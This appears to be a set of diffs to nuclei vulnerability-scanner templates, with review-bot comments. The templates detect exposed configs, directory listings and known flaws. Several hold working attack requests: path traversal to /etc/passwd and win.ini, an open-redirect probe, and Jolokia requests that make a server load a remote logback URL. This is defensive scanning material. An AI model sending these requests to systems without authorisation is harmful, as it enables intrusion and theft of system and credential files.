description: Searches for exposed Visual Studio Code Directories by querying the /.vscode endpoint and existence of "index of" in the body
tags: vscode,exposure
requests:
- method: GET
path:
- "{{BaseURL}}/.vscode/"
matchers:
- type: word
words:
- "Index of /.vscode"
part: body


@ -0,0 +1,25 @@
id: hikvision-info-leak
info:
name: Hikvision Info Leak
author: pikpikcu
severity: medium
tags: exposure,config
requests:
- method: GET
path:
- '{{BaseURL}}/config/user.xml'
matchers-condition: and
matchers:
- type: word
words:
- '<user name='
- 'password='
condition: and
- type: word
words:
- "text/xml"
part: header
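Review bot: `tags: exposure,config` carries no product tag although the path `/config/user.xml` and the name are Hikvision-specific; use `tags: hikvision,exposure,config` so the template is reachable with `-tags hikvision`. A `type: status` matcher for `200` would also match the sibling exposure templates.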


@ -0,0 +1,27 @@
id: zend-config-file
info:
name: Zend Configuration File
author: pdteam
severity: high
tags: config,exposure,zend,php
requests:
- method: GET
path:
- "{{BaseURL}}/application/configs/application.ini"
matchers-condition: and
matchers:
- type: word
words:
- "resources.db.params.password"
- type: word
words:
- "text/plain"
part: header
- type: status
status:
- 200


@ -26,6 +26,8 @@ requests:
part: body
regex:
- (K|k)ey(up|down|press)
- (K|k)eyboard(N|n)avigation
condition: or
negative: true
extractors:

iot/epson-wf-series.yaml Normal file

@ -0,0 +1,23 @@
id: epson-wf-series
info:
name: Epson WF Series Detection
author: aashiq
severity: info
description: Searches for Epson WF series printers on the domain
tags: iot,printer
requests:
- method: GET
path:
- "{{BaseURL}}/PRESENTATION/HTML/TOP/PRTINFO.HTML"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "SEIKO EPSON"


@ -16,4 +16,4 @@ requests:
part: header
group: 1
regex:
- "Allow: ([A-Z,]+)"
- "Allow: ([A-Z, ]+)"


@ -0,0 +1,26 @@
id: airflow-debug
info:
name: Airflow Debug Trace
author: pdteam
severity: low
tags: apache,airflow,fpd
requests:
- method: GET
path:
- "{{BaseURL}}/admin/airflow/login"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<h1> Ooops. </h1>"
- "Traceback (most recent call last)"
condition: and
- type: status
status:
- 500


@ -0,0 +1,27 @@
id: alibaba-mongoshake-unauth
info:
name: Alibaba Mongoshake Unauth
author: pikpikcu
severity: info
tags: mongoshake,unauth
requests:
- method: GET
path:
- '{{BaseURL}}/'
matchers-condition: and
matchers:
- type: word
words:
- '{"Uri":"/worker","Method":"GET"}'
- type: word
words:
- 'text/plain'
part: header
- type: status
status:
- 200


@ -0,0 +1,25 @@
id: private-key-exposure
info:
name: Private key exposure via helper detector
author: aashiq
severity: high
description: Searches for private key exposure by attempting to query the helper endpoint on node_modules
tags: exposure,node
requests:
- method: GET
path:
- "{{BaseURL}}/node_modules/mqtt/test/helpers/"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "Index of /node_modules/mqtt/test/helpers"
- "Parent Directory"
condition: and
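Review bot: The matchers only confirm a directory listing of `/node_modules/mqtt/test/helpers/`; nothing checks that a key file is present or readable, yet `name:` claims a private key exposure and `severity: high`. Either add a second request that matches PEM markers in one of the listed files, or rename and downgrade the template to what it proves (an exposed `node_modules` listing) and say so in `description:`.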


@ -12,8 +12,14 @@ requests:
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: word
words:
- The page you have requested does not exist
- Repository not found
- Repository not found
part: body
- type: word
words:
- text/plain
part: header


@ -3,9 +3,9 @@ id: landingi-takeover
info:
name: landingi takeover detection
author: pdcommunity
severity: high
severity: info
tags: takeover
reference: https://github.com/EdOverflow/can-i-take-over-xyz
reference: https://github.com/EdOverflow/can-i-take-over-xyz/issues/117
requests:
- method: GET
@ -16,4 +16,5 @@ requests:
- type: word
words:
- It looks like you're lost
- The page you are looking for is not found
- The page you are looking for is not found
condition: and


@ -0,0 +1,24 @@
id: airflow-detect
info:
name: Apache Airflow
author: pdteam
severity: info
tags: tech,apache,airflow
requests:
- method: GET
path:
- "{{BaseURL}}/{{randstr}}"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Airflow 404 = lots of circles"
- type: status
status:
- 404


@ -1,7 +1,7 @@
id: graphql
id: graphql-detect
info:
name: GraphQL API
name: GraphQL API Detection
author: NkxxkN & ELSFA7110
severity: info
@ -51,6 +51,7 @@ requests:
headers:
Content-Type: application/json
body: '{"query":"query IntrospectionQuery{__schema {queryType { name }}}"}'
matchers-condition: and
@ -58,8 +59,10 @@ requests:
- type: status
status:
- 200
- type: regex
regex:
- "__schema"
- "(Introspection|INTROSPECTION|introspection).*?"
- ".*?operation not found.*?"
condition: or
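Review bot: The new regex list wraps plain substrings in `.*?` (`".*?operation not found.*?"`) and spells out three casings of `introspection`; unanchored Go regexes already match anywhere, so `- "operation not found"` and `- "(?i)introspection"` express the same thing more clearly, and `__schema` needs no regex at all. A `type: word` matcher with the same strings and `condition: or` would be cheaper still. The matcher block begins outside this hunk.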


@ -4,17 +4,30 @@ info:
name: Detect Telerik Web UI Dialog Handler
author: organiccrap & zhenwarx
severity: info
reference: https://captmeelo.com/pentest/2018/08/03/pwning-with-telerik.html
reference: |
- https://captmeelo.com/pentest/2018/08/03/pwning-with-telerik.html
- https://github.com/bao7uo/dp_crypto
tags: telerik,asp
requests:
- method: GET
path:
- '{{BaseURL}}/Telerik.Web.UI.DialogHandler.aspx'
- '{{BaseURL}}/DesktopModules/Admin/RadEditorProvider/telerik.web.ui.dialoghandler.aspx'
- '{{BaseURL}}/providers/htmleditorproviders/telerik/telerik.web.ui.dialoghandler.aspx'
- '{{BaseURL}}/desktopmodules/telerikwebui/radeditorprovider/telerik.web.ui.dialoghandler.aspx'
- '{{BaseURL}}/desktopmodules/dnnwerk.radeditorprovider/dialoghandler.aspx'
- '{{BaseURL}}/Telerik.Web.UI.DialogHandler.aspx?dp=1'
- '{{BaseURL}}/desktopmodules/telerikwebui/radeditorprovider/telerik.web.ui.dialoghandler.aspx?dp=1'
- '{{BaseURL}}/desktopmodules/dnnwerk.radeditorprovider/dialoghandler.aspx?dp=1'
- '{{BaseURL}}/DesktopModules/Admin/RadEditorProvider/DialogHandler.aspx?dp=1'
- '{{BaseURL}}/DesktopModule/UIQuestionControls/UIAskQuestion/Telerik.Web.UI.DialogHandler.aspx?dp=1'
- '{{BaseURL}}/Modules/CMS/Telerik.Web.UI.DialogHandler.aspx?dp=1'
- '{{BaseURL}}/Admin/ServerSide/Telerik.Web.UI.DialogHandler.aspx?dp=1'
- '{{BaseURL}}/DesktopModules/TNComments/Telerik.Web.UI.DialogHandler.aspx?dp=1'
- '{{BaseURL}}/Providers/HtmlEditorProviders/Telerik/Telerik.Web.UI.DialogHandler.aspx?dp=1'
- '{{BaseURL}}/App_Master/Telerik.Web.UI.DialogHandler.aspx?dp=1'
- '{{BaseURL}}/common/admin/PhotoGallery2/Telerik.Web.UI.DialogHandler.aspx?dp=1'
- '{{BaseURL}}/common/admin/Jobs2/Telerik.Web.UI.DialogHandler.aspx?dp=1'
- '{{BaseURL}}/AsiCommon/Controls/ContentManagement/ContentDesigner/Telerik.Web.UI.DialogHandler.aspx?dp=1'
- '{{BaseURL}}/common/admin/Calendar/Telerik.Web.UI.DialogHandler.aspx?dp=1'
- '{{BaseURL}}/cms/portlets/Telerik.Web.UI.DialogHandler.aspx?dp=1'
- '{{BaseURL}}/dashboard/UserControl/CMS/Page/Telerik.Web.UI.DialogHandler.aspx/Desktopmodules/Admin/dnnWerk.Users/DialogHandler.aspx?dp=1'
matchers-condition: and
matchers:
@ -23,4 +36,4 @@ requests:
- 200
- type: word
words:
- Loading the dialog...
- 'Invalid length for a Base-64 char array'
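Review bot: The last added path, `/dashboard/UserControl/CMS/Page/Telerik.Web.UI.DialogHandler.aspx/Desktopmodules/Admin/dnnWerk.Users/DialogHandler.aspx?dp=1`, looks like two entries fused during copy-paste (a handler path followed by a second `/Desktopmodules/…/DialogHandler.aspx`); split it into `/dashboard/UserControl/CMS/Page/Telerik.Web.UI.DialogHandler.aspx?dp=1` and `/Desktopmodules/Admin/dnnWerk.Users/DialogHandler.aspx?dp=1`. Four of the `?dp=1` paths duplicate earlier plain paths against the same hosts; since the new word matcher relies on `Invalid length for a Base-64 char array`, which the plain requests presumably do not trigger, keeping only the `dp=1` forms would halve the requests — confirm that before removing them.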


@ -0,0 +1,24 @@
id: blue-ocean-excellence-lfi
info:
name: Blue Ocean Excellence LFI
author: pikpikcu
severity: high
reference: https://blog.csdn.net/qq_41901122/article/details/116786883
tags: blue-ocean,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/download.php?file=../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "toor:[x*]:0:0"
- type: status
status:
- 200
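Review bot: The regex reads `toor:[x*]:0:0`, but `/etc/passwd` begins with `root:`; every other file-read template in this commit (`hjtcloud-arbitrary-file-read`, `interlib-fileread`, `nsasg-arbitrary-file-read`) uses `root:[x*]:0:0`, so this template will almost never match. Change it to `- "root:[x*]:0:0"`.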


@ -0,0 +1,43 @@
id: hjtcloud-arbitrary-file-read
info:
name: HJTcloud Arbitrary File Read
author: pikpikcu
severity: high
reference: https://mp.weixin.qq.com/s/w2pkj5ADN7b5uxe-wmfGbw
tags: hjtcloud,lfi
requests:
- raw:
- |
POST /fileDownload?action=downloadBackupFile HTTP/1.1
Host: {{Hostname}}
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 20
fullPath=/etc/passwd
- |
POST /fileDownload?action=downloadBackupFile HTTP/1.1
Host: {{Hostname}}
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 20
fullPath=/Windows/win.ini
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0:"
- "bit app support"
condition: or
- type: status
status:
- 200
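Review bot: Both raw requests declare `Content-Length: 20`, but only the first body (`fullPath=/etc/passwd`) is 20 bytes; `fullPath=/Windows/win.ini` is 25. nuclei recomputes the length for non-unsafe raw requests as far as I know, which is why this is not failing today, but a copy-pasted wrong value misleads anyone reading or replaying the request; drop the header from both requests or correct the second to `Content-Length: 25`.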


@ -0,0 +1,34 @@
id: hjtcloud-rest-arbitrary-file-read
info:
name: HJTcloud Arbitrary file read
author: pikpikcu
severity: low
reference: https://mp.weixin.qq.com/s/w2pkj5ADN7b5uxe-wmfGbw
tags: hjtcloud,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/him/api/rest/V1.0/system/log/list?filePath=../"
matchers-condition: and
matchers:
- type: word
words:
- '"name":'
- '"length":'
- '"filePath":'
- '"list":'
condition: and
part: body
- type: word
words:
- "application/json"
part: header
- type: status
status:
- 200
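Review bot: `name` and `tags` call this an arbitrary file read, but the request only asks `system/log/list` for `filePath=../` and the matcher checks generic JSON keys (`"name":`, `"length":`, `"list":`) that many listing APIs return, so what is actually confirmed is a directory listing outside the log directory. Consider `name: HJTcloud REST API Directory Listing` plus a `description` stating that `filePath` follows `../`, and say why this is `severity: low` while the sibling hjtcloud template citing the same reference is `high`. Without that a reader cannot tell whether the two templates cover one issue or two.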

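--- /dev/null
+++ b/[path not shown on page]
@@ -0,0 +1,27 @@
+id: interlib-fileread
+info:
+name: Interlib Fileread
+author: pikpikcu
+severity: high
+reference: https://github.com/PeiQi0/PeiQi-WIKI-POC/blob/PeiQi/PeiQi_Wiki/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E5%9B%BE%E5%88%9B%E8%BD%AF%E4%BB%B6/%E5%9B%BE%E5%88%9B%E8%BD%AF%E4%BB%B6%20%E5%9B%BE%E4%B9%A6%E9%A6%86%E7%AB%99%E7%BE%A4%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md
+tags: interlib,lfi
+requests:
+- method: GET
+path:
+- "{{BaseURL}}/interlib/report/ShowImage?localPath=etc/passwd"
+- "{{BaseURL}}/interlib/report/ShowImage?localPath=C:\\Windows\\system.ini"
+matchers-condition: and
+matchers:
+- type: regex
+regex:
+- "root:[x*]:0:0"
+- "for 16-bit app support"
+condition: or
+- type: status
+status:
+- 200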
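Review bot: The second path `localPath=C:\\Windows\\system.ini` is a double-quoted YAML scalar, so each `\\` is decoded to a single backslash before the URL is built; that is correct but easy to "fix" wrongly later, so a comment above the line, `# double-quoted: \\ decodes to \ in the request`, would guard it. The `info` block has no `description`; one sentence on `report/ShowImage` returning the file named by `localPath` would match the other templates in this commit. The percent-encoded reference URL is unreadable as written, so a short comment giving the advisory's title would help maintainers.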


@ -5,6 +5,7 @@ info:
author: dhiyaneshDk
severity: medium
tags: kafdrop,xss
description: A vulnerability in KafDrop allows remote unauthenticated attackers to inject arbitrary HTML and/or Javascript into the response returned by the server.
reference: https://github.com/HomeAdvisor/Kafdrop/issues/12
requests:
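Review bot: The added `description` spells the product `KafDrop` while `tags` and the referenced repository use `Kafdrop`, and `Javascript` should be `JavaScript`; suggested wording: `description: A vulnerability in Kafdrop allows remote unauthenticated attackers to inject arbitrary HTML and/or JavaScript into the response returned by the server.` The rest of the `info` block is outside the hunk, so I could not check the key order against the other templates.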

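--- /dev/null
+++ b/[path not shown on page]
@@ -0,0 +1,23 @@
+id: nsasg-arbitrary-file-read
+info:
+name: NS ASG Arbitrary File Read
+author: pikpikcu
+severity: high
+tags: nsasg,lfi
+requests:
+- method: GET
+path:
+- "{{BaseURL}}/admin/cert_download.php?file=pqpqpqpq.txt&certfile=../../../../../../../../etc/passwd"
+matchers-condition: and
+matchers:
+- type: regex
+regex:
+- "root:[x*]:0:0"
+- type: status
+status:
+- 200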
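Review bot: `info` has neither `description` nor `reference`, unlike every other template added in this commit, so a maintainer cannot verify which product version the `admin/cert_download.php` check applies to or retire it once fixed. Add a `reference:` line pointing at the advisory the check was written from and a one-line `description:` naming `certfile` as the parameter that is not constrained to the certificate directory. A comment on the path line saying whether `file=pqpqpqpq.txt` is required by the endpoint or is an arbitrary value would also save the next reader a guess.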

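--- /dev/null
+++ b/[path not shown on page]
@@ -0,0 +1,20 @@
+id: odoo-cms-redirect
+info:
+name: Odoo CMS - Open redirection all Version
+author: 0x_Akoko
+description: Odoo CMS - Open redirection all Version.
+reference: https://cxsecurity.com/issue/WLB-2021020143
+severity: low
+tags: odoo,redirect
+requests:
+- method: GET
+path:
+- "{{BaseURL}}/website/lang/en_US?r=https://example.com/"
+matchers:
+- type: regex
+regex:
+- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
+part: header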
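Review bot: `description` repeats `name` verbatim and the phrase `all Version` is ungrammatical, so the field adds nothing for a reader; suggested `name: Odoo CMS - Open Redirect (all versions)` and `description: The r parameter of /website/lang/en_US in Odoo CMS is used as a redirect target without validating that it points at the same host.` Since the only matcher is a regex on the `Location` header, it may be worth a comment noting that no status check is needed because a `Location` header is only meaningful on a redirect response.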


@ -2,7 +2,7 @@ id: springboot-actuators-jolokia-xxe
info:
name: Spring Boot Actuators (Jolokia) XXE
author: dwisiswant0
author: dwisiswant0 & ipanda
severity: high
description: A vulnerability in Spring Boot Actuators's 'jolokia' endpoint allows remote attackers to preform an XML External Entities attack, include content stored on a remote server as if it was its own - this has the potential to allow the execution of arbitrary code and/or disclosure of sensitive information from the target machine.
reference: |
@ -14,6 +14,8 @@ requests:
- method: GET
path:
- "{{BaseURL}}/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/nonexistent:31337!/logback.xml"
- "{{BaseURL}}/actuator/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/random:915!/logback.xml"
matchers-condition: and
matchers:
- type: status
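Review bot: `author: dwisiswant0 & ipanda` uses an ampersand, whereas list-valued metadata elsewhere in this PR is comma-separated (`tags: xiuno,cnvd`), so tooling that splits on commas will treat the whole string as one author; `author: dwisiswant0,ipanda` is the form I would expect. The added path points at `random:915` while the existing one uses `nonexistent:31337`; both appear to be deliberately unresolvable hosts, and a comment such as `# host is intentionally bogus; only the error response is matched` would stop someone "correcting" them. The matchers block continues outside the hunk, so I could not check which status or words are asserted for the new path.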

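--- /dev/null
+++ b/[path not shown on page]
@@ -0,0 +1,24 @@
+id: wordpress-db-repair
+info:
+name: Wordpress DB Repair Exposed
+author: _C0wb0y_
+severity: low
+description: Discover enabled Wordpress repair page.
+tags: wordpress,config,fpd
+requests:
+- method: GET
+path:
+- "{{BaseURL}}/wp-admin/maint/repair.php"
+matchers-condition: and
+matchers:
+- type: word
+words:
+- "<title>WordPress"
+- type: word
+words:
+- "define('WP_ALLOW_REPAIR', true);"
+negative: true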
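Review bot: There is no status matcher, so any response whose body contains `<title>WordPress` and lacks the `WP_ALLOW_REPAIR` hint is reported — a themed 404 page or a login redirect on a site whose title begins with "WordPress" would be a false positive. Add `- type: status` / `status:` / `- 200` next to the two word matchers; the `matchers-condition: and` already present makes it effective. A positive word matcher for text that only the enabled repair page shows would tighten it further, but verify the exact string against a test install before adding it.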

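--- /dev/null
+++ b/[path not shown on page]
@@ -0,0 +1,28 @@
+id: wp-mailchimp-log-exposure
+info:
+name: WordPress Mailchimp 4 Debug Log Exposure
+author: aashiq
+severity: medium
+description: Searches for Mailchimp log exposure by attempting to query the debug log endpoint on wp-content
+tags: logs,wordpress,exposure
+requests:
+- method: GET
+path:
+- "{{BaseURL}}/wp-content/uploads/mc4wp-debug.log"
+matchers-condition: and
+matchers:
+- type: status
+status:
+- 200
+- type: word
+words:
+- "WARNING: Form"
+- type: word
+words:
+- 'text/plain'
+part: header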
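Review bot: The word matcher `WARNING: Form` only fires once the plugin has logged at least one form warning, so an exposed but empty or info-only `mc4wp-debug.log` is missed; if that trade-off is intended, state it in the description, e.g. `description: Checks whether the MC4WP debug log under wp-content/uploads is publicly readable; only logs that already contain a form warning are detected.` Otherwise match on a token present in every log line rather than the warning level — confirm the log format before changing it.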

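--- /dev/null
+++ b/[path not shown on page]
@@ -0,0 +1,33 @@
+id: wp-plugin-statistics-sqli
+info:
+name: WordPress Plugin WP Statistics 13.0-.7 - Unauthenticated Time-Based Blind SQL Injection
+author: lotusdll
+severity: critical
+description: The WP Statistic WordPress plugin was affected by an Unauthenticated Time-Based Blind SQL Injection security vulnerability.
+reference: |
+- https://www.exploit-db.com/exploits/49894
+- https://www.wordfence.com/blog/2021/05/over-600000-sites-impacted-by-wp-statistics-patch/
+- https://github.com/Udyz/WP-Statistics-BlindSQL
+tags: wordpress,wp-plugin,unauth,sqli,blind
+requests:
+- method: GET
+path:
+- '{{BaseURL}}/wp-content/plugins/wp-statistics/readme.txt'
+matchers-condition: and
+matchers:
+- type: status
+status:
+- 200
+- type: word
+words:
+- "WP Statistics"
+part: body
+- type: regex
+regex:
+- 'Stable tag\: [1][3]\.[0].([1]|[2]|[3]|[4]|[5]|[6]|[7])|[1][3]\.[0]$'
+part: body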
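Review bot: The version regex has a top-level alternation: the second branch `[1][3]\.[0]$` is not tied to `Stable tag` at all, and because Go's regexp treats `$` as end of input unless `(?m)` is set (the odoo template in this commit uses `(?m)` for exactly that), it only matches a readme whose final characters are `13.0`; the unescaped `.` after `[0]` also matches any character, not just a dot. A single anchored pattern such as `'(?m)^Stable tag: 13\.0(\.[1-7])?\s*$'` covers `13.0` and `13.0.1`–`13.0.7` and tolerates CRLF line endings. The `description` should also say that this template fingerprints an affected version from `readme.txt` rather than exercising the injection, so a site running a patched build whose readme was not bumped may be reported as vulnerable.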

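--- /dev/null
+++ b/[path not shown on page]
@@ -0,0 +1,25 @@
+id: wordpress-popup-listing
+info:
+name: WordPress Popup Plugin Directory Listing
+author: aashiq
+severity: info
+description: Searches for sensitive directories present in the wordpress-popup plugin.
+tags: wordpress,listing
+requests:
+- method: GET
+path:
+- "{{BaseURL}}/wp-content/plugins/wordpress-popup/views/admin/"
+matchers-condition: and
+matchers:
+- type: status
+status:
+- 200
+- type: word
+words:
+- "Index of"
+- "/wp-content/plugins/wordpress-popup/views/admin"
+condition: and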

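--- a/[path not shown on page]
+++ /dev/null
@@ -1,32 +0,0 @@
-id: wp-uploads-listing
-info:
-name: WordPress Upload Directory Listing Enable
-author: yashgoti
-severity: info
-tags: wordpress
-requests:
-- method: GET
-path:
-- "{{BaseURL}}/wp-content/uploads/"
-- "{{BaseURL}}/wp-content/uploads/2015/"
-- "{{BaseURL}}/wp-content/uploads/2016/"
-- "{{BaseURL}}/wp-content/uploads/2017/"
-- "{{BaseURL}}/wp-content/uploads/2018/"
-- "{{BaseURL}}/wp-content/uploads/2019/"
-- "{{BaseURL}}/wp-content/uploads/2020/"
-- "{{BaseURL}}/wp-content/uploads/2021/"
-- "{{BaseURL}}/wp-content/uploads/cfdb7_uploads/"
-matchers-condition: and
-matchers:
-- type: word
-words:
-- "Directory listing for"
-- "Index of /"
-- "[To Parent Directory]"
-- "Directory: /"
-- type: status
-status:
-- 200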

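--- /dev/null
+++ b/[path not shown on page]
@@ -0,0 +1,18 @@
+id: airflow-workflow
+info:
+name: Apache Airflow Security Checks
+author: pdteam
+description: A simple workflow that runs all Apache Airflow related nuclei templates on a given target.
+tags: workflow
+workflows:
+- template: technologies/airflow-detect.yaml
+subtemplates:
+- template: cves/2020/CVE-2020-11978.yaml
+- template: cves/2020/CVE-2020-13927.yaml
+- template: exposed-panels/airflow-panel.yaml
+- template: exposures/configs/airflow-configuration-exposure.yaml
+- template: default-logins/apache/airflow-default-credentials.yaml
+- template: misconfiguration/airflow/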


@ -6,9 +6,9 @@ info:
description: A simple workflow that runs all Ruijie related nuclei templates on a given target.
workflows:
- template: default-logins/smartweb/ruijie-smartweb-default-password.yaml
- template: cnvd/CNVD-2021-17369.yaml
- template: vulnerabilities/other/ruijie-networks-lfi.yaml
- template: vulnerabilities/other/ruijie-networks-rce.yaml
- template: exposures/configs/ruijie-information-disclosure.yaml
- template: exposures/configs/ruijie-smartweb-disclosure.yaml
- template: cnvd/CNVD-2020-56167.yaml
- template: exposures/configs/ruijie-phpinfo.yaml


@ -32,4 +32,5 @@ workflows:
- template: cves/2020/CVE-2020-35489.yaml
- template: cves/2021/CVE-2021-24146.yaml
- template: cves/2021/CVE-2021-24176.yaml
- template: cves/2021/CVE-2021-24316.yaml
- template: vulnerabilities/wordpress/